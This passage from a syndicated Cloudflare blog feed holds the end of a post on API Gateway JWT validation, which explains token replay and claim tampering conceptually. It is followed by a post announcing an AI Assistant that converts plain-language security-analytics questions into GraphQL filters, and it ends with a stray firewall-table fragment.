No developer wants to release an insecure application, and no security team wants their developers to skip secure coding practices, but we know both happen. In the Enterprise Strategy Group report “Securing the API Attack Surface”², a survey found that 39% of developers skip security processes due to the faster development cycles of continuous integration and continuous delivery (CI/CD). The same survey found more than half (57%) of responding organizations faced multiple security incidents related to insecure APIs in the last 12 months, and 35% of responding organizations faced at least one incident within the last year.

Along with its accompanying database, permissions, and user roles, your origin application is the ultimate security backstop of your API. However, Cloudflare can assist in keeping attacks away from your origin when you configure API Gateway with the correct context. Let’s examine three different API attacks and how to protect against them.

Missing or broken authentication

The ability for a user to send or receive data to an API and entirely bypass authentication falls into ‘broken authentication’. It’s easy to think of the expected use cases your users will take with your application. You may assume that just because a user logs in and your application is written so that users can only access their own data in their dashboard, that all users are logged in and would only access their own data. This assumption fails to account for a user making an HTTP request outside your application requesting or modifying another user’s data and there being nothing in the way to stop your API from replying. In the worst case, a lack of authorization policy checks can enable an API client to change data without an authentication token at all!

Ensuring that incoming requests have an authentication token attached to them and dropping the requests that don’t is a great way to stop the simplest API attacks.

Expired token reuse

Maybe your application already uses JWTs for user authentication. Your application decodes the JWT and looks for user claims for group membership, and you validate the claims before allowing customers access to your API. But are you checking the JWT expiration time?

Imagine a user pays for your service, but they secretly know they will soon downgrade to a free account. If the user’s tier is stored within the JWT and the application or gateway doesn’t validate the expiration time of the JWT, the user could save an old JWT and replay it to continue their access to their paid benefits. Validating JWT expiration time can prevent this type of replay attack.

Broken Function Level Authorization attacks: Tampering with claims

Let’s say you’re using JWTs for authentication, validating the claims inside them, and also validating expiration time. But do you verify the JWT signature? Practically every JWT is signed by its issuer such that API admins and security teams that know the issuer’s signing key can verify that the JWT hasn’t been tampered with. Without the API Gateway or application checking the JWT signature, a malicious user could change their JWT claims, elevating their privileges to assume an administrator role in an application by starting with a normal, non-privileged user account.

JWT Validation from API Gateway safeguards your API from broken authentication and authorization attacks by checking that JWT signatures are intact, expiry times haven’t yet passed, and that authentication tokens are present to begin with.

Don’t other Cloudflare products do this?

Other Cloudflare products also use JWTs. Cloudflare Access is part of our suite of Zero Trust products, and is meant to tie into your Identity Provider. As a best practice, customers should validate the JWT that Access creates and sends to the origin.

Conversely, JWT Validation for API Gateway is a security layer compatible with any API without changing the setup, management, or expectation of the existing user flow. API Gateway’s JWT Validation is meant to validate pre-existing JWTs that may be used by any number of services at your API origin. You really need both: Access for your internal users or employees and API Gateway for your external users.

In addition, some customers use a custom Cloudflare Worker to validate JWTs, which is a great use case for the Workers platform. However, for straightforward use cases customers may find the JWT Validation experience of API Gateway easier to interact with and manage over the lifecycle of their application. If you are validating JWTs with a Worker and today’s release of JWT Validation isn’t yet at feature parity for your custom Worker, let your account representative know. We’re interested in expanding our capabilities to meet your requirements.

What’s next?

In a future release, we will go beyond checking pre-existing JWTs, and customers will be able to generate and enforce authorization policies entirely within API Gateway. We’ll also upgrade our on-demand developer portal creation with the ability to issue keys and authentication tokens to your development team directly, streamlining API management with Cloudflare.

In addition, stay tuned for future API Gateway feature launches where we’ll use our knowledge of API traffic norms to automatically suggest security policies that highlight and stop Broken Object/Function Level Authorization attacks outside the JWT Validation use case.

Existing API Gateway customers can try the new feature now. Enterprise customers without API Gateway should sign up for the trial to try the latest from API Gateway.

—

¹Gartner, “API Security: What You Need to Do to Protect Your APIs”, Analyst(s) Mark O’Neill, Dionisio Zumerle, Jeremy D’Hoinne, January 13, 2023
²Enterprise Strategy Group, “Securing the API Attack Surface”, Analyst, Melinda Marks, May 2023

Cloudflare launches AI Assistant for Security Analytics

2024-03-04 Jen Sells

Post Syndicated from Jen Sells original https://blog.cloudflare.com/security-analytics-ai-assistant

Imagine you are in the middle of an attack on your most crucial production application, and you need to understand what’s going on. How happy would you be if you could simply log into the Dashboard and type a question such as: “Compare attack traffic between US and UK” or “Compare rate limiting blocks for automated traffic with rate limiting blocks from human traffic” and see a time series chart appear on your screen without needing to select a complex set of filters?

Today, we are introducing an AI assistant to help you query your security event data, enabling you to more quickly discover anomalies and potential security attacks. You can now use plain language to interrogate Cloudflare analytics and let us do the magic.

What did we build?

One of the big challenges when analyzing a spike in traffic or any anomaly in your traffic is to create filters that isolate the root cause of an issue. This means knowing your way around often complex dashboards and tools, knowing where to click and what to filter on.

On top of this, any traditional security dashboard is limited to what you can achieve by the way data is stored, how databases are indexed, and by what fields are allowed when creating filters. With our Security Analytics view, for example, it was difficult to compare time series with different characteristics. For example, you couldn’t compare the traffic from IP address x.x.x.x with automated traffic from Germany without opening multiple tabs to Security Analytics and filtering separately. From an engineering perspective, it would be extremely hard to build a system that allows these types of unconstrained comparisons.

With the AI Assistant, we are removing this complexity by leveraging our Workers AI platform to build a tool that can help you query your HTTP request and security event data and generate time series charts based on a request formulated with natural language. Now the AI Assistant does the hard work of figuring out the necessary filters and additionally can plot multiple series of data on a single graph to aid in comparisons. This new tool opens up a new way of interrogating data and logs, unconstrained by the restrictions introduced by traditional dashboards.

Now it is easier than ever to get powerful insights about your application security by using plain language to interrogate your data and better understand how Cloudflare is protecting your business. The new AI Assistant is located in the Security Analytics dashboard and works seamlessly with the existing filters. The answers you need are just a question away.

What can you ask?

To demonstrate the capabilities of AI Assistant, we started by considering the questions that we ask ourselves every day when helping customers to deploy the best security solutions for their applications.

We’ve included some clickable examples in the dashboard to get you started.

You can use the AI Assistant to

Identify the source of a spike in attack traffic by asking: “Compare attack traffic between US and UK”
Identify root cause of 5xx errors by asking: “Compare origin and edge 5xx errors”
See which browsers are most commonly used by your users by asking:”Compare traffic across major web browsers”
For an ecommerce site, understand what percentage of users visit vs add items to their shopping cart by asking: “Compare traffic between /api/login and /api/basket”
Identify bot attacks against your ecommerce site by asking: “Show requests to /api/basket with a bot score less than 20”
Identify the HTTP versions used by clients by asking: “Compare traffic by each HTTP version”
Identify unwanted automated traffic to specific endpoints by asking: “Show POST requests to /admin with a Bot Score over 30”

You can start from these when exploring the AI Assistant.

How does it work?

Using Cloudflare’s powerful Workers AI global network inference platform, we were able to use one of the off-the-shelf large language models (LLMs) offered on the platform to convert customer queries into GraphQL filters. By teaching an AI model about the available filters we have on our Security Analytics GraphQL dataset, we can have the AI model turn a request such as “Compare attack traffic on /api and /admin endpoints” into a matching set of structured filters:

```
[
  {“name”: “Attack Traffic on /api”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/api”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]},
  {“name”: “Attack Traffic on /admin”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/admin”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]}
]
```

Then, using the filters provided by the AI model, we can make requests to our GraphQL APIs, gather the requisite data, and plot a data visualization to answer the customer query.

By using this method, we are able to keep customer information private and avoid exposing any security analytics data to the AI model itself, while still allowing humans to query their data with ease. This ensures that your queries will never be used to train the model. And because Workers AI hosts a local instance of the LLM on Cloudflare’s own network, your queries and resulting data never leave Cloudflare’s network.

Future Development

We are in the early stages of developing this capability and plan to rapidly extend the capabilities of the Security Analytics AI Assistant. Don’t be surprised if we cannot handle some of your requests at the beginning. At launch, we are able to support basic inquiries that can be plotted in a time series chart such as “show me” or “compare” for any currently filterable fields.

However, we realize there are a number of use cases that we haven’t even thought of, and we are excited to release the Beta version of AI Assistant to all Business and Enterprise customers to let you test the feature and see what you can do with it. We would love to hear your feedback and learn more about what you find useful and what you would like to see in it next. With future versions, you’ll be able to ask questions such as “Did I experience any attacks yesterday?” and use AI to automatically generate WAF rules for you to apply to mitigate them.

Beta availability

Starting today, AI Assistant is available for a select few users and rolling out to all Business and Enterprise customers throughout March. Look out for it and try for free and let us know what you think by using the Feedback link at the top of the Security Analytics page.

Final pricing will be determined prior to general availability.

Source IP	Source Port	Destination IP	Destination Port
Any	Any	Any	443